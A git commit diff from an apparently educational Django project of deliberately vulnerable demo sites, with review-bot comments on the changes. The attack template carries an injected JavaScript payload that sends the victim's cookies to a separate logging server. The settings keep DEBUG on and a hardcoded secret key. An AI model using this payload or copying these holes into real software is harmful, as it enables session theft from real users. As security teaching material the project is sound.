fixed Witter icon

Faraphel 2024-05-15 11:13:58 +02:00
parent d614b8ea26
commit 0b961c7551
3 changed files with 10 additions and 9 deletions


@ -5,9 +5,9 @@ from django.contrib.auth.decorators import login_required
from django.core.handlers.wsgi import WSGIRequest from django.core.handlers.wsgi import WSGIRequest
from django.http import HttpResponse, HttpResponseForbidden, HttpResponseBadRequest from django.http import HttpResponse, HttpResponseForbidden, HttpResponseBadRequest
from django.shortcuts import render, redirect, get_object_or_404 from django.shortcuts import render, redirect, get_object_or_404
from django.views.decorators.csrf import csrf_protect
from apps.TouYube import forms, models from apps.TouYube import forms, models
from configuration import settings
def view_homepage(request: WSGIRequest) -> HttpResponse: def view_homepage(request: WSGIRequest) -> HttpResponse:
@ -143,11 +143,11 @@ def view_attack_some(request: WSGIRequest) -> HttpResponse:
""" """
# check the method # check the method
if request.method != "GET": if request.method != "POST":
return HttpResponseBadRequest() return HttpResponseBadRequest()
# get the callback code # get the callback code
callback_js = request.GET["callback"] callback_js = request.POST["callback"]
return render( return render(
request, request,
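Review bot: `request.POST["callback"]` in `view_attack_some` raises `MultiValueDictKeyError` when the field is missing, so a POST without `callback` ends in an unhandled 500 rather than the 400 that the method check just above returns. With `DEBUG = True` in the settings file, that 500 is rendered as a full traceback page. Reading the field with `callback_js = request.POST.get("callback")` followed by `if callback_js is None: return HttpResponseBadRequest()` keeps both failure paths consistent. The value is then passed to `render(...)`, whose arguments lie outside this hunk, so how the template escapes it cannot be judged from here.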


@ -24,7 +24,7 @@ SECRET_KEY = 'django-insecure-87uz=bnd&m+$(!qfzs3$bum)!e6pw$8gaw_^cehmuyuft5q4!#
# SECURITY WARNING: don't run with debug turned on in production! # SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True DEBUG = True
ENABLE_CROSS_ORIGIN_SECURITY = False ENABLE_CROSS_ORIGIN_SECURITY = True # Enable all the CORS, XFRAME, ... securities
ALLOWED_HOSTS = [] ALLOWED_HOSTS = []
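Review bot: The trailing comment on `ENABLE_CROSS_ORIGIN_SECURITY` ("Enable all the CORS, XFRAME, ... securities") does not say which protections the flag switches, and the code that reads the flag is not in this hunk. This is a project-specific setting, not a Django one, so a reader cannot look it up. A comment above the line should name each middleware or header it gates, for example `# Project flag: when False the demo runs without <list the protections gated by this flag>`. Flipping the default is also a security-relevant change that the commit title does not mention, which makes it easy to miss in the history.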


@ -4,7 +4,7 @@
{% block body %} {% block body %}
<h1>SOME</h1> <h1>SOME</h1>
<form id="attack-form" action="http://localhost:8080/callback/" method="GET"> <form id="attack-form" action="http://localhost:8080/callback/" method="POST">
<input type="hidden" name="callback" value=" <input type="hidden" name="callback" value="
{# once the victim is calling the callback, send his cookies to this URL #} {# once the victim is calling the callback, send his cookies to this URL #}
fetch('http://localhost:8081/logs/', { fetch('http://localhost:8081/logs/', {
@ -15,9 +15,10 @@
headers: { headers: {
'Content-type': 'application/json; charset=UTF-8' 'Content-type': 'application/json; charset=UTF-8'
} }
}); }).then(data => {
{# redirect the user to the homepage #} {# redirect the user to the homepage #}
document.location.href='http://localhost:8080/'; document.location.href='http://localhost:8080/';
});
"> ">
<input type="submit" value="See my TouYube account with no security flaw 😊"> <input type="submit" value="See my TouYube account with no security flaw 😊">